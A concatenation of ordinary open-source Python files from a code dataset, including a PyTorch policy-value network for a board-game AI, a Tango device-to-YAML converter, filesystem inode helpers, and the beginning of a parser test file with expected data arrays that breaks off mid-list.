An implementation of the policyValueNet in PyTorch
Tested in PyTorch 0.2.0 and 0.3.0
@author: <NAME>
"""
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from torch.autograd import Variable
import numpy as np
def set_learning_rate(optimizer, lr):
    """Overwrite the learning rate of every parameter group in *optimizer*."""
    for group in optimizer.param_groups:
        group["lr"] = lr
class Net(nn.Module):
    """Policy-value network module.

    Maps a 4-plane board encoding of shape (batch, 4, H, W) to
      * log move probabilities over the H*W board positions, and
      * a scalar state value in [-1, 1].
    """
    def __init__(self, board_width, board_height):
        super(Net, self).__init__()
        self.board_width = board_width
        self.board_height = board_height
        # common layers
        self.conv1 = nn.Conv2d(4, 32, kernel_size=3, padding=1)
        self.conv2 = nn.Conv2d(32, 64, kernel_size=3, padding=1)
        self.conv3 = nn.Conv2d(64, 128, kernel_size=3, padding=1)
        # action policy layers
        self.act_conv1 = nn.Conv2d(128, 4, kernel_size=1)
        self.act_fc1 = nn.Linear(4 * board_width * board_height,
                                 board_width * board_height)
        # state value layers
        self.val_conv1 = nn.Conv2d(128, 2, kernel_size=1)
        self.val_fc1 = nn.Linear(2 * board_width * board_height, 64)
        self.val_fc2 = nn.Linear(64, 1)
    def forward(self, state_input):
        """Return (log_action_probs, state_value) for a batch of states."""
        # common layers
        x = F.relu(self.conv1(state_input))
        x = F.relu(self.conv2(x))
        x = F.relu(self.conv3(x))
        # action policy layers
        x_act = F.relu(self.act_conv1(x))
        x_act = x_act.view(-1, 4 * self.board_width * self.board_height)
        # dim=1 made explicit: implicit-dim log_softmax is deprecated, and
        # for this 2-D tensor the implicit choice was dim 1 anyway.
        x_act = F.log_softmax(self.act_fc1(x_act), dim=1)
        # state value layers
        x_val = F.relu(self.val_conv1(x))
        x_val = x_val.view(-1, 2 * self.board_width * self.board_height)
        x_val = F.relu(self.val_fc1(x_val))
        # torch.tanh replaces the deprecated F.tanh alias (same numerics).
        x_val = torch.tanh(self.val_fc2(x_val))
        return x_act, x_val
class PolicyValueNet():
    """Policy-value network wrapper: owns the Net module, its Adam
    optimizer, and the train/predict/save entry points.

    NOTE(review): written for PyTorch 0.2/0.3 (see module docstring) --
    `Variable` is a deprecated no-op wrapper since 0.4, and the
    `loss.data[0]` indexing at the bottom of train_step raises on 0-dim
    tensors in PyTorch >= 0.5 (modern code would use `.item()`).
    """
    def __init__(self, board_width, board_height,
                 model_file=None, use_gpu=False):
        self.use_gpu = use_gpu
        self.board_width = board_width
        self.board_height = board_height
        self.l2_const = 1e-4  # coef of l2 penalty
        # the policy value net module
        if self.use_gpu:
            self.policy_value_net = Net(board_width, board_height).cuda()
        else:
            self.policy_value_net = Net(board_width, board_height)
        # print("debug:", self.policy_value_net)
        """
        debug: Net(
          (conv1): Conv2d(4, 32, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
          (conv2): Conv2d(32, 64, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
          (conv3): Conv2d(64, 128, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
          (act_conv1): Conv2d(128, 4, kernel_size=(1, 1), stride=(1, 1))
          (act_fc1): Linear(in_features=144, out_features=36, bias=True)  # 4 x width x height
          (val_conv1): Conv2d(128, 2, kernel_size=(1, 1), stride=(1, 1))
          (val_fc1): Linear(in_features=72, out_features=64, bias=True)  # 2 x width x height
          (val_fc2): Linear(in_features=64, out_features=1, bias=True)
        )
        """
        # L2 regularization is applied via the optimizer's weight decay
        self.optimizer = optim.Adam(self.policy_value_net.parameters(),
                                    weight_decay=self.l2_const)
        if model_file:
            net_params = torch.load(model_file)
            # debug: <class 'collections.OrderedDict'>
            # print("debug:", type(net_params))
            self.policy_value_net.load_state_dict(net_params)
    def policy_value(self, state_batch):
        """
        input: a batch of states
        output: a batch of action probabilities and state values
        """
        if self.use_gpu:
            state_batch = Variable(torch.FloatTensor(state_batch).cuda())
            log_act_probs, value = self.policy_value_net(state_batch)
            act_probs = np.exp(log_act_probs.data.cpu().numpy())
            return act_probs, value.data.cpu().numpy()
        else:
            state_batch = Variable(torch.FloatTensor(state_batch))
            log_act_probs, value = self.policy_value_net(state_batch)
            # exponentiate the network's log-probabilities back to probs
            act_probs = np.exp(log_act_probs.data.numpy())
            # print("debug: pv", type(state_batch), state_batch.shape)
            # print("debug: pv", type(log_act_probs), log_act_probs.shape, log_act_probs[0])
            # print("debug: pv", type(value), value.shape, value[0])
            # print("debug: pv", type(act_probs), act_probs.shape, act_probs[0])
            """
            debug: pv <class 'torch.Tensor'> torch.Size([512, 4, 6, 6])
            debug: pv <class 'torch.Tensor'> torch.Size([512, 36]) tensor([-3.5188, -3.6358, -3.5779, -3.6464, -3.6030, -3.6298, -3.5478,
            -3.5090, -3.5997, -3.5677, -3.5541, -3.6722, -3.5616, -3.5636,
            -3.5926, -3.4936, -3.5709, -3.6210, -3.5447, -3.6076, -3.5882,
            -3.5600, -3.4815, -3.5765, -3.6788, -3.6113, -3.5063, -3.6241,
            -3.5781, -3.5612, -3.5779, -3.6497, -3.6608, -3.6400, -3.5247,
            -3.6140])
            debug: pv <class 'torch.Tensor'> torch.Size([512, 1]) tensor(1.00000e-02 *
            [ 2.5594])
            debug: pv <class 'numpy.ndarray'> (512, 36) [0.02963571 0.02636158 0.02793355 0.02608529 0.02724108 0.02652155
            0.02878688 0.0299259 0.02733225 0.02821934 0.02860781 0.02542085
            0.02839345 0.02833655 0.02752793 0.03039031 0.02813084 0.02675619
            0.0288761 0.02711727 0.02764767 0.02843794 0.03076018 0.02797232
            0.02525269 0.02701536 0.03000749 0.02667333 0.02792769 0.02840393
            0.0279335 0.02599909 0.02571266 0.02625342 0.02945924 0.02694306]
            """
            return act_probs, value.data.numpy()
    def policy_value_fn(self, board):
        """
        input: board
        output: a list of (action, probability) tuples for each available
        action and the score of the board state
        """
        legal_positions = board.availables
        # reshape the flat board state into (1, 4, W, H) planes;
        # ascontiguousarray guarantees the layout torch.from_numpy needs
        current_state = np.ascontiguousarray(board.current_state().reshape(
            -1, 4, self.board_width, self.board_height))
        if self.use_gpu:
            log_act_probs, value = self.policy_value_net(
                Variable(torch.from_numpy(current_state)).cuda().float())
            act_probs = np.exp(log_act_probs.data.cpu().numpy().flatten())
        else:
            log_act_probs, value = self.policy_value_net(
                Variable(torch.from_numpy(current_state)).float())
            act_probs = np.exp(log_act_probs.data.numpy().flatten())
        # print("debug: pvf", legal_positions)
        # print("debug: pvf,", value, log_act_probs, act_probs)
        """
        debug: pvf [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 33, 34, 35]
        debug: pvf, tensor([[-0.1340]]) tensor([[-3.5891, -3.6159, -3.6483, -3.6113, -3.5677, -3.6311, -3.5342,
        -3.6449, -3.6345, -3.5444, -3.5193, -3.5488, -3.5690, -3.6075,
        -3.6792, -3.6329, -3.5296, -3.6544, -3.5786, -3.5870, -3.5027,
        -3.5944, -3.5537, -3.6383, -3.6251, -3.5364, -3.5302, -3.6542,
        -3.6004, -3.6269, -3.5623, -3.5152, -3.5181, -3.5594, -3.5809,
        -3.5221]]) [0.02762223 0.02689152 0.02603547 0.02701722 0.02822023 0.02648623
        0.02918113 0.02612401 0.02639725 0.02888605 0.02961869 0.02876004
        0.02818486 0.02711975 0.02524304 0.0264391 0.02931764 0.02587646
        0.02791596 0.02768259 0.030115 0.02747608 0.0286187 0.0262969
        0.02664538 0.02911758 0.02930048 0.02588317 0.02731332 0.02659828
        0.02837263 0.02974232 0.02965699 0.02845607 0.02785116 0.02953648]
        """
        # keep only the probabilities of the legal moves; note zip() is a
        # lazy iterator under Python 3
        act_probs = zip(legal_positions, act_probs[legal_positions])
        value = value.data[0][0]
        # # debug: pvf value tensor(-0.1340)
        # print("debug: pvf value", value)
        return act_probs, value
    def train_step(self, state_batch, mcts_probs, winner_batch, lr):
        """perform a training step"""
        # wrap in Variable
        if self.use_gpu:
            state_batch = Variable(torch.FloatTensor(state_batch).cuda())
            mcts_probs = Variable(torch.FloatTensor(mcts_probs).cuda())
            winner_batch = Variable(torch.FloatTensor(winner_batch).cuda())
        else:
            state_batch = Variable(torch.FloatTensor(state_batch))
            mcts_probs = Variable(torch.FloatTensor(mcts_probs))
            winner_batch = Variable(torch.FloatTensor(winner_batch))
        # zero the parameter gradients
        self.optimizer.zero_grad()
        # set learning rate
        set_learning_rate(self.optimizer, lr)
        # forward
        log_act_probs, value = self.policy_value_net(state_batch)
        # define the loss = (z - v)^2 - pi^T * log(p) + c||theta||^2
        # Note: the L2 penalty is incorporated in optimizer
        value_loss = F.mse_loss(value.view(-1), winner_batch)
        policy_loss = -torch.mean(torch.sum(mcts_probs * log_act_probs, 1))
        loss = value_loss + policy_loss
        # backward and optimize
        loss.backward()
        self.optimizer.step()
        # calc policy entropy, for monitoring only
        entropy = -torch.mean(
            torch.sum(torch.exp(log_act_probs) * log_act_probs, 1)
        )
        # print("debug:", loss, loss.data[0], "{:.5f} |x {:.5f}".format(loss.data[0], loss))
        # print("debug:", entropy, entropy.data[0])
        """
        debug: tensor(4.1732) tensor(4.1732) 4.17323 |x 4.17323
        debug: tensor(3.5791) tensor(3.5791)
        """
        # NOTE(review): .data[0] on a 0-dim tensor raises on PyTorch >= 0.5;
        # modern code would return loss.item(), entropy.item()
        return loss.data[0], entropy.data[0]
    def get_policy_param(self):
        """Return the network's state dict (model parameters)."""
        net_params = self.policy_value_net.state_dict()
        return net_params
    def save_model(self, model_file):
        """ save model params to file """
        net_params = self.get_policy_param()  # get model params
        torch.save(net_params, model_file)
| StarcoderdataPython |
11313812 | <filename>src/snovault/elasticsearch/searches/interfaces.py<gh_stars>10-100
# Registry/config keys used by the elasticsearch search framework.
NON_SORTABLE = 'non_sortable'
SEARCH_CONFIG = 'search_config'
| StarcoderdataPython |
206190 | <gh_stars>10-100
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""
Analyze and simplify IncompleteInodes so that we can more easily check that
the salient parts of the filesystem are as we expect.
Similar to `get_frequency_of_selinux_xattrs` and `ItemFilters` from
`send_stream.py`, but for already-constructed filesystems.
"""
from typing import Tuple, Union
from .incomplete_inode import IncompleteDir, IncompleteInode
from .inode import Inode, InodeOwner
_SELINUX_XATTR = b"security.selinux"
def erase_mode_and_owner(
    ino: Union[IncompleteInode, Inode],
    *,
    owner: "InodeOwner",
    file_mode: int,
    dir_mode: int,
):
    """Null out `ino.owner` and `ino.mode` when they match the expected
    defaults, so later comparisons only surface meaningful differences."""
    if ino.owner == owner:
        # pyre-fixme[41]: Cannot reassign final attribute `owner`.
        ino.owner = None
    expected_mode = dir_mode if isinstance(ino, IncompleteDir) else file_mode
    if ino.mode == expected_mode:
        # pyre-fixme[41]: Cannot reassign final attribute `mode`.
        ino.mode = None
def erase_utimes_in_range(
    ino: Union[IncompleteInode, Inode],
    start: Tuple[int, int],
    end: Tuple[int, int],
):
    """Drop `ino.utimes` when ctime, mtime and atime all fall inside the
    closed interval [start, end]."""
    stamps = ino.utimes
    if stamps is None:
        return
    if all(start <= t <= end for t in (stamps.ctime, stamps.mtime, stamps.atime)):
        # pyre-fixme[41]: Cannot reassign final attribute `utimes`.
        ino.utimes = None
def erase_selinux_xattr(ino: Union[IncompleteInode, Inode]):
    """Remove the `security.selinux` xattr from `ino`, if present."""
    # Getting coverage for this line would force us to have a hard
    # dependency on running this test on an SELinux-enabled filesystem.
    # Mocking that seems like useless effort, so let's waive coverage.
    if _SELINUX_XATTR in ino.xattrs:  # pragma: no cover
        del ino.xattrs[_SELINUX_XATTR]  # pragma: no cover
| StarcoderdataPython |
8134497 | <gh_stars>1-10
#########################################################################################
# Copyright 2020 SKA South Africa (http://ska.ac.za/) #
# #
# BSD license - see LICENSE.txt for details #
#########################################################################################
"""Module that contains the TangoToYAML class that parses a Tango device specification
file (xmi, fgo) or a running Tango device into YAML"""
from pathlib import Path
import yaml
class TangoToYAML:
    """Class that translates a Tango specification file or a running Tango
    device to YAML."""

    # Command metadata keys whose values are dtype enums, serialized via
    # their ``.name``.
    _COMMAND_ENUM_KEYS = frozenset(("dtype_in", "dtype_out"))
    # Attribute metadata keys whose values are enums, serialized via ``.name``.
    _ATTRIBUTE_ENUM_KEYS = frozenset(("data_format", "data_type", "disp_level"))
    # Attribute metadata keys copied through verbatim when truthy; any key
    # not listed here (or above) is dropped from the output.
    _ATTRIBUTE_PLAIN_KEYS = frozenset((
        "name",
        "delta_val",
        "enum_labels",
        "period",
        "display_unit",
        "standard_unit",
        "unit",
        "max_dim_y",
        "max_dim_x",
        "label",
        "max_value",
        "min_alarm",
        "max_warning",
        "description",
        "format",
        "delta_t",
        "max_alarm",
        "min_value",
        "inherited",
        "min_warning",
        "writable",
        "writable_attr_name",
    ))

    def __init__(self, parser_class):
        """Initialise TangoToYAML with a parser class

        Parameters
        ----------
        parser_class : Python class definition
            A Python class that implements methods,
            - `parse`
            - `get_device_command_metadata`
            - `get_device_attribute_metadata`
            - `get_device_properties_metadata`
            and has the attribute `device_class_name`
        """
        self.parser = parser_class()

    @staticmethod
    def _name_first(keys):
        """Return *keys* sorted alphabetically, with "name" moved to the
        front; raises ValueError if "name" is absent."""
        ordered = sorted(keys)
        ordered.insert(0, ordered.pop(ordered.index("name")))
        return ordered

    def _format_command(self, command):
        """Return a YAML-ready dict for one command ("name" key first)."""
        formatted = {}
        for key in self._name_first(command.keys()):
            value = command[key]
            formatted[key] = value.name if key in self._COMMAND_ENUM_KEYS else value
        return formatted

    def _format_attribute(self, attribute):
        """Return a YAML-ready dict for one attribute ("name" key first).

        Enum-valued keys are serialized via ``.name``; whitelisted plain
        keys are copied only when truthy; everything else is dropped.
        """
        formatted = {}
        for key in self._name_first(attribute.keys()):
            value = attribute[key]
            if key in self._ATTRIBUTE_ENUM_KEYS:
                formatted[key] = value.name
            elif key in self._ATTRIBUTE_PLAIN_KEYS and value:
                formatted[key] = value
        return formatted

    def _build_yaml(self):
        """Render the parser's device metadata as a YAML document string."""
        commands = sorted(
            self.parser.get_device_command_metadata().values(),
            key=lambda item: item["name"],
        )
        attributes = sorted(
            self.parser.get_device_attribute_metadata().values(),
            key=lambda item: item["name"],
        )
        properties = sorted(
            self.parser.get_device_properties_metadata("deviceProperties").values(),
            key=lambda item: item["name"],
        )
        data_dict = [
            {
                "class": self.parser.device_class_name,
                "meta": {
                    "commands": [self._format_command(c) for c in commands],
                    "attributes": [self._format_attribute(a) for a in attributes],
                    "properties": [{"name": p["name"]} for p in properties],
                },
            }
        ]
        # sort_keys=False preserves the insertion order established above
        return yaml.dump(data_dict, sort_keys=False)

    def build_yaml_from_file(self, file_loc):
        """Builds YAML from a Tango specification file

        Parameters
        ----------
        file_loc : str
            The path to the specification file

        Returns
        -------
        str
            A YAML representation of the specification file

        Raises
        ------
        AssertionError
            If *file_loc* does not point to an existing file.
        """
        file_path = Path(file_loc)
        if not file_path.is_file():
            # Raised explicitly (not via `assert`) so the check survives
            # `python -O`; AssertionError kept for backward compatibility.
            raise AssertionError("{} is not a file".format(file_loc))
        self.parser.parse(file_loc)
        return self._build_yaml()

    def build_yaml_from_device(self, device_name):
        """Interrogates a running Tango device and builds the YAML from its
        attributes, properties and commands.

        Parameters
        ----------
        device_name : str
            Tango device name in the domain/family/member format or the
            FQDN tango://<TANGO_HOST>:<TANGO_PORT>/domain/family/member

        Returns
        -------
        str
            A YAML representation of the device's metadata.
        """
        self.parser.parse(device_name)
        return self._build_yaml()
| StarcoderdataPython |
280109 | <filename>mi/dataset/parser/test/test_optaa_dj_dcl.py
#!/usr/bin/env python
"""
@package mi.dataset.parser.test.test_optaa_dj_dcl
@file marine-integrations/mi/dataset/parser/test/test_optaa_dj_dcl.py
@author <NAME> (Raytheon)
@brief Test code for a optaa_dj_dcl data parser
Files used for testing:
20010314_010314.optaa1.log
Records - 3, Measurements - 1, 3, 14
20020704_020704.optaa2.log
Records - 5, Measurements - 0, 2, 7, 4, 27
20031031_031031.optaa3.log
Records - 3, Measurements - 50, 255, 125
20041220_041220.optaa4.log
Records - 4, Measurements - 255, 175, 150, 255
20050401_050401.optaa5.log
Records - 3, Measurements - 1, 2, 3
All records have a checksum error - No particles will be produced
20061225_061225.optaa6.log
Records - 10, Measurements - 1, 2, 3, 4, 5, 6, 7, 8, 9, 10
"""
import os
from nose.plugins.attrib import attr
from mi.core.log import get_logger; log = get_logger()
from mi.core.exceptions import DatasetParserException
from mi.core.instrument.data_particle import DataParticleKey
from mi.dataset.test.test_parser import ParserUnitTestCase
from mi.dataset.dataset_parser import DataSetDriverConfigKeys
from mi.dataset.parser.optaa_dj_dcl import \
OptaaDjDclRecoveredParser, \
OptaaDjDclTelemeteredParser, \
OptaaDjDclRecoveredInstrumentDataParticle, \
OptaaDjDclRecoveredMetadataDataParticle, \
OptaaDjDclTelemeteredInstrumentDataParticle, \
OptaaDjDclTelemeteredMetadataDataParticle, \
OptaaStateKey
from mi.idk.config import Config
RESOURCE_PATH = os.path.join(Config().base_dir(), 'mi', 'dataset', 'driver',
'optaa_dj', 'dcl', 'resource')
MODULE_NAME = 'mi.dataset.parser.optaa_dj_dcl'
# Expected tuples for data in file 20010314_010314.optaa1.log
EXPECTED_20010314_010314_optaa1 = [
((3193520594.000), ('2001-03-14 01:03:14', 4, 83, 1193047)),
((3193520594.000), (1, 2, 3, 4, 5, 6, 7, 111, 1,
[0],
[32767],
[32767],
[65535])),
((3193520594.111), (2, 4, 6, 8, 10, 12, 14, 222, 3,
[0, 16383, 32766],
[32767, 49150, 65533],
[32767, 16384, 1],
[65535, 49152, 32769])),
((3193520594.222), (3, 6, 9, 12, 15, 18, 21, 333, 14,
[0, 2520, 5040, 7560, 10080, 12600, 15120, 17640, 20160, 22680, 25200,
27720, 30240, 32760],
[32767, 35287, 37807, 40327, 42847, 45367, 47887, 50407, 52927, 55447,
57967, 60487, 63007, 65527],
[32767, 30247, 27727, 25207, 22687, 20167, 17647, 15127, 12607, 10087,
7567, 5047, 2527, 7],
[65535, 63015, 60495, 57975, 55455, 52935, 50415, 47895, 45375, 42855,
40335, 37815, 35295, 32775]))
]
# Expected tuples for data in file 20020704_020704.optaa2.log
EXPECTED_20020704_020704_optaa2 = [
((3234737224.000), ('2002-07-04 02:07:04', 5, 83, 1193048)),
((3234737224.000), (1, 2, 3, 4, 5, 6, 7, 222, 0,
[],
[],
[],
[])),
((3234737224.222), (2, 4, 6, 8, 10, 12, 14, 444, 2,
[0, 32767],
[32767, 65534],
[32767, 0],
[65535, 32768])),
((3234737224.444), (3, 6, 9, 12, 15, 18, 21, 666, 7,
[0, 5461, 10922, 16383, 21844, 27305, 32766],
[32767, 38228, 43689, 49150, 54611, 60072, 65533],
[32767, 27306, 21845, 16384, 10923, 5462, 1],
[65535, 60074, 54613, 49152, 43691, 38230, 32769])),
((3234737224.666), (4, 8, 12, 16, 20, 24, 28, 888, 4,
[0, 10922, 21844, 32766],
[32767, 43689, 54611, 65533],
[32767, 21845, 10923, 1],
[65535, 54613, 43691, 32769])),
((3234737224.888), (5, 10, 15, 20, 25, 30, 35, 1110, 27,
[0, 1260, 2520, 3780, 5040, 6300, 7560, 8820, 10080, 11340, 12600, 13860,
15120, 16380, 17640, 18900, 20160, 21420, 22680, 23940, 25200, 26460, 27720,
28980, 30240, 31500, 32760],
[32767, 34027, 35287, 36547, 37807, 39067, 40327, 41587, 42847, 44107,
45367, 46627, 47887, 49147, 50407, 51667, 52927, 54187, 55447, 56707, 57967,
59227, 60487, 61747, 63007, 64267, 65527],
[32767, 31507, 30247, 28987, 27727, 26467, 25207, 23947, 22687, 21427,
20167, 18907, 17647, 16387, 15127, 13867, 12607, 11347, 10087, 8827, 7567,
6307, 5047, 3787, 2527, 1267, 7],
[65535, 64275, 63015, 61755, 60495, 59235, 57975, 56715, 55455, 54195,
52935, 51675, 50415, 49155, 47895, 46635, 45375, 44115, 42855, 41595, 40335,
39075, 37815, 36555, 35295, 34035, 32775]))
]
# Expected tuples for data in file 20031031_031031.optaa3.log
EXPECTED_20031031_031031_optaa3 = [
((3276558631.000), ('2003-10-31 03:10:31', 6, 83, 1193049)),
((3276558631.000), (1, 2, 3, 4, 5, 6, 7, 333, 50,
[0, 668, 1336, 2004, 2672, 3340, 4008, 4676, 5344, 6012, 6680, 7348,
8016, 8684, 9352, 10020, 10688, 11356, 12024, 12692, 13360, 14028, 14696,
15364, 16032, 16700, 17368, 18036, 18704, 19372, 20040, 20708, 21376, 22044,
22712, 23380, 24048, 24716, 25384, 26052, 26720, 27388, 28056, 28724, 29392,
30060, 30728, 31396, 32064, 32732],
[32767, 33435, 34103, 34771, 35439, 36107, 36775, 37443, 38111, 38779,
39447, 40115, 40783, 41451, 42119, 42787, 43455, 44123, 44791, 45459, 46127,
46795, 47463, 48131, 48799, 49467, 50135, 50803, 51471, 52139, 52807, 53475,
54143, 54811, 55479, 56147, 56815, 57483, 58151, 58819, 59487, 60155, 60823,
61491, 62159, 62827, 63495, 64163, 64831, 65499],
[32767, 32099, 31431, 30763, 30095, 29427, 28759, 28091, 27423, 26755,
26087, 25419, 24751, 24083, 23415, 22747, 22079, 21411, 20743, 20075, 19407,
18739, 18071, 17403, 16735, 16067, 15399, 14731, 14063, 13395, 12727, 12059,
11391, 10723, 10055, 9387, 8719, 8051, 7383, 6715, 6047, 5379, 4711, 4043,
3375, 2707, 2039, 1371, 703, 35],
[65535, 64867, 64199, 63531, 62863, 62195, 61527, 60859, 60191, 59523,
58855, 58187, 57519, 56851, 56183, 55515, 54847, 54179, 53511, 52843, 52175,
51507, 50839, 50171, 49503, 48835, 48167, 47499, 46831, 46163, 45495, 44827,
44159, 43491, 42823, 42155, 41487, 40819, 40151, 39483, 38815, 38147, 37479,
36811, 36143, 35475, 34807, 34139, 33471, 32803])),
((3276558631.333), (2, 4, 6, 8, 10, 12, 14, 666, 255,
[0, 129, 258, 387, 516, 645, 774, 903, 1032, 1161, 1290, 1419, 1548,
1677, 1806, 1935, 2064, 2193, 2322, 2451, 2580, 2709, 2838, 2967, 3096, 3225,
3354, 3483, 3612, 3741, 3870, 3999, 4128, 4257, 4386, 4515, 4644, 4773, 4902,
5031, 5160, 5289, 5418, 5547, 5676, 5805, 5934, 6063, 6192, 6321, 6450, 6579,
6708, 6837, 6966, 7095, 7224, 7353, 7482, 7611, 7740, 7869, 7998, 8127, 8256,
8385, 8514, 8643, 8772, 8901, 9030, 9159, 9288, 9417, 9546, 9675, 9804, 9933,
10062, 10191, 10320, 10449, 10578, 10707, 10836, 10965, 11094, 11223, 11352,
11481, 11610, 11739, 11868, 11997, 12126, 12255, 12384, 12513, 12642, 12771,
12900, 13029, 13158, 13287, 13416, 13545, 13674, 13803, 13932, 14061, 14190,
14319, 14448, 14577, 14706, 14835, 14964, 15093, 15222, 15351, 15480, 15609,
15738, 15867, 15996, 16125, 16254, 16383, 16512, 16641, 16770, 16899, 17028,
17157, 17286, 17415, 17544, 17673, 17802, 17931, 18060, 18189, 18318, 18447,
18576, 18705, 18834, 18963, 19092, 19221, 19350, 19479, 19608, 19737, 19866,
19995, 20124, 20253, 20382, 20511, 20640, 20769, 20898, 21027, 21156, 21285,
21414, 21543, 21672, 21801, 21930, 22059, 22188, 22317, 22446, 22575, 22704,
22833, 22962, 23091, 23220, 23349, 23478, 23607, 23736, 23865, 23994, 24123,
24252, 24381, 24510, 24639, 24768, 24897, 25026, 25155, 25284, 25413, 25542,
25671, 25800, 25929, 26058, 26187, 26316, 26445, 26574, 26703, 26832, 26961,
27090, 27219, 27348, 27477, 27606, 27735, 27864, 27993, 28122, 28251, 28380,
28509, 28638, 28767, 28896, 29025, 29154, 29283, 29412, 29541, 29670, 29799,
29928, 30057, 30186, 30315, 30444, 30573, 30702, 30831, 30960, 31089, 31218,
31347, 31476, 31605, 31734, 31863, 31992, 32121, 32250, 32379, 32508, 32637,
32766],
[32767, 32896, 33025, 33154, 33283, 33412, 33541, 33670, 33799, 33928,
34057, 34186, 34315, 34444, 34573, 34702, 34831, 34960, 35089, 35218, 35347,
35476, 35605, 35734, 35863, 35992, 36121, 36250, 36379, 36508, 36637, 36766,
36895, 37024, 37153, 37282, 37411, 37540, 37669, 37798, 37927, 38056, 38185,
38314, 38443, 38572, 38701, 38830, 38959, 39088, 39217, 39346, 39475, 39604,
39733, 39862, 39991, 40120, 40249, 40378, 40507, 40636, 40765, 40894, 41023,
41152, 41281, 41410, 41539, 41668, 41797, 41926, 42055, 42184, 42313, 42442,
42571, 42700, 42829, 42958, 43087, 43216, 43345, 43474, 43603, 43732, 43861,
43990, 44119, 44248, 44377, 44506, 44635, 44764, 44893, 45022, 45151, 45280,
45409, 45538, 45667, 45796, 45925, 46054, 46183, 46312, 46441, 46570, 46699,
46828, 46957, 47086, 47215, 47344, 47473, 47602, 47731, 47860, 47989, 48118,
48247, 48376, 48505, 48634, 48763, 48892, 49021, 49150, 49279, 49408, 49537,
49666, 49795, 49924, 50053, 50182, 50311, 50440, 50569, 50698, 50827, 50956,
51085, 51214, 51343, 51472, 51601, 51730, 51859, 51988, 52117, 52246, 52375,
52504, 52633, 52762, 52891, 53020, 53149, 53278, 53407, 53536, 53665, 53794,
53923, 54052, 54181, 54310, 54439, 54568, 54697, 54826, 54955, 55084, 55213,
55342, 55471, 55600, 55729, 55858, 55987, 56116, 56245, 56374, 56503, 56632,
56761, 56890, 57019, 57148, 57277, 57406, 57535, 57664, 57793, 57922, 58051,
58180, 58309, 58438, 58567, 58696, 58825, 58954, 59083, 59212, 59341, 59470,
59599, 59728, 59857, 59986, 60115, 60244, 60373, 60502, 60631, 60760, 60889,
61018, 61147, 61276, 61405, 61534, 61663, 61792, 61921, 62050, 62179, 62308,
62437, 62566, 62695, 62824, 62953, 63082, 63211, 63340, 63469, 63598, 63727,
63856, 63985, 64114, 64243, 64372, 64501, 64630, 64759, 64888, 65017, 65146,
65275, 65404, 65533],
[32767, 32638, 32509, 32380, 32251, 32122, 31993, 31864, 31735, 31606,
31477, 31348, 31219, 31090, 30961, 30832, 30703, 30574, 30445, 30316, 30187,
30058, 29929, 29800, 29671, 29542, 29413, 29284, 29155, 29026, 28897, 28768,
28639, 28510, 28381, 28252, 28123, 27994, 27865, 27736, 27607, 27478, 27349,
27220, 27091, 26962, 26833, 26704, 26575, 26446, 26317, 26188, 26059, 25930,
25801, 25672, 25543, 25414, 25285, 25156, 25027, 24898, 24769, 24640, 24511,
24382, 24253, 24124, 23995, 23866, 23737, 23608, 23479, 23350, 23221, 23092,
22963, 22834, 22705, 22576, 22447, 22318, 22189, 22060, 21931, 21802, 21673,
21544, 21415, 21286, 21157, 21028, 20899, 20770, 20641, 20512, 20383, 20254,
20125, 19996, 19867, 19738, 19609, 19480, 19351, 19222, 19093, 18964, 18835,
18706, 18577, 18448, 18319, 18190, 18061, 17932, 17803, 17674, 17545, 17416,
17287, 17158, 17029, 16900, 16771, 16642, 16513, 16384, 16255, 16126, 15997,
15868, 15739, 15610, 15481, 15352, 15223, 15094, 14965, 14836, 14707, 14578,
14449, 14320, 14191, 14062, 13933, 13804, 13675, 13546, 13417, 13288, 13159,
13030, 12901, 12772, 12643, 12514, 12385, 12256, 12127, 11998, 11869, 11740,
11611, 11482, 11353, 11224, 11095, 10966, 10837, 10708, 10579, 10450, 10321,
10192, 10063, 9934, 9805, 9676, 9547, 9418, 9289, 9160, 9031, 8902, 8773,
8644, 8515, 8386, 8257, 8128, 7999, 7870, 7741, 7612, 7483, 7354, 7225, 7096,
6967, 6838, 6709, 6580, 6451, 6322, 6193, 6064, 5935, 5806, 5677, 5548, 5419,
5290, 5161, 5032, 4903, 4774, 4645, 4516, 4387, 4258, 4129, 4000, 3871, 3742,
3613, 3484, 3355, 3226, 3097, 2968, 2839, 2710, 2581, 2452, 2323, 2194, 2065,
1936, 1807, 1678, 1549, 1420, 1291, 1162, 1033, 904, 775, 646, 517, 388, 259,
130, 1],
[65535, 65406, 65277, 65148, 65019, 64890, 64761, 64632, 64503, 64374,
64245, 64116, 63987, 63858, 63729, 63600, 63471, 63342, 63213, 63084, 62955,
62826, 62697, 62568, 62439, 62310, 62181, 62052, 61923, 61794, 61665, 61536,
61407, 61278, 61149, 61020, 60891, 60762, 60633, 60504, 60375, 60246, 60117,
59988, 59859, 59730, 59601, 59472, 59343, 59214, 59085, 58956, 58827, 58698,
58569, 58440, 58311, 58182, 58053, 57924, 57795, 57666, 57537, 57408, 57279,
57150, 57021, 56892, 56763, 56634, 56505, 56376, 56247, 56118, 55989, 55860,
55731, 55602, 55473, 55344, 55215, 55086, 54957, 54828, 54699, 54570, 54441,
54312, 54183, 54054, 53925, 53796, 53667, 53538, 53409, 53280, 53151, 53022,
52893, 52764, 52635, 52506, 52377, 52248, 52119, 51990, 51861, 51732, 51603,
51474, 51345, 51216, 51087, 50958, 50829, 50700, 50571, 50442, 50313, 50184,
50055, 49926, 49797, 49668, 49539, 49410, 49281, 49152, 49023, 48894, 48765,
48636, 48507, 48378, 48249, 48120, 47991, 47862, 47733, 47604, 47475, 47346,
47217, 47088, 46959, 46830, 46701, 46572, 46443, 46314, 46185, 46056, 45927,
45798, 45669, 45540, 45411, 45282, 45153, 45024, 44895, 44766, 44637, 44508,
44379, 44250, 44121, 43992, 43863, 43734, 43605, 43476, 43347, 43218, 43089,
42960, 42831, 42702, 42573, 42444, 42315, 42186, 42057, 41928, 41799, 41670,
41541, 41412, 41283, 41154, 41025, 40896, 40767, 40638, 40509, 40380, 40251,
40122, 39993, 39864, 39735, 39606, 39477, 39348, 39219, 39090, 38961, 38832,
